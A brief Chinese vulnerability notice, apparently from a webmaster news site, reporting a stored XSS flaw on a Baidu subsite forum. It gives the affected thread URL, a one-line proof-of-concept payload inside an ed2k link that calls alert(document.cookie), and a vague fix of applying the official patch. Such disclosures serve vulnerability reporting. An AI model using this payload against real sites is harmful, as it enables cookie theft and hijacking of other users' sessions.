百度某分站存储型xss漏洞下载

百度某分站存储型xss漏洞http://rw.baidu.com/forum.php?mod=viewthread&tid=1082&extra=page%3D1



利用代码ed2k://|file|test|'+alert(document.cookie)+'|test/

修复方案:

打最新官方补丁,或者自己修一下也可以

上一篇: 至顶网SQL注入主站数据库暴露下载
下一篇: 大汉版通身份认证JIS系统任意文件下载漏洞下载
当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细